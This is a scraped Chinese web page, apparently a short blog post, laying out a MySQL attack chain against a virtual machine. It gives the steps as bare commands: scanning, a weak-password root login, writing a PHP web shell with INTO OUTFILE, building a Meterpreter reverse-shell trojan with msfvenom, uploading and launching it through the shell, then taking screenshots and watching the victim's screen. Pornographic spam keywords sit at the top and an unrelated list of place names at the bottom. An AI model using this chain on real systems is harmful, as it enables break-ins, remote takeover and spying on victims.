国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

網(wǎng)絡(luò)安全 mysql漏洞攻擊虛擬機(jī)測試

2023-08-23 19:32 作者:游戲開發(fā)周泓愷  | 我要投稿

ifconfig//本機(jī)ip

nbtscan//掃描其他主機(jī)

nmap 192.168.0.9/24//掃描端口 檢測是否有3306端口

mysql -h 192.168.0.9 -u root -proot//弱密碼登錄mysql

select user();//查看用戶

show variables like "%secure%";//查看配置

192.168.0.7//打開網(wǎng)站(假如受害機(jī)正在使用php+mysql)

select "<?php @system($_GET['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/a.php"//創(chuàng)建文件到主機(jī),必須要存在運(yùn)行php網(wǎng)站的目錄下

192.168.0.7/a.php?cmd=whoami//打開當(dāng)當(dāng)創(chuàng)建好的文件,查看Windows權(quán)限


msfvenmom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.125 LPORT=8080 -f exe > shell.exe//創(chuàng)建木馬程序

//以下是相關(guān)配置

msfconsole

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 8080

exploit


復(fù)制shell.exe里面的內(nèi)容

192.168.0.7/a.php/?cmd =echo 粘貼內(nèi)容 -> C:\Users\Administrator\shell.exe//將木馬傳到受害機(jī)

192.168.0.7/a.php/?cmd =start C:\Users\Administrator\shell.exe//在受害機(jī)上打開木馬程序


screenshot //給受害機(jī)截屏

run vnc//查看受害機(jī)正在干什么


網(wǎng)絡(luò)安全 mysql漏洞攻擊虛擬機(jī)測試的評論 (共 條)

分享到微博請遵守國家法律
上思县| 增城市| 五指山市| 石门县| 清涧县| 莱西市| 楚雄市| 修武县| 明溪县| 犍为县| 昌平区| 阿拉善左旗| 云安县| 楚雄市| 曲沃县| 榆树市| 仙桃市| 曲水县| 黔南| 交城县| 北安市| 井冈山市| 全州县| 岳池县| 华坪县| 万山特区| 定兴县| 柳河县| 土默特右旗| 九台市| 邮箱| 罗城| 中宁县| 兰州市| 宜川县| 正安县| 安乡县| 潮州市| 卓资县| 延边| 德格县|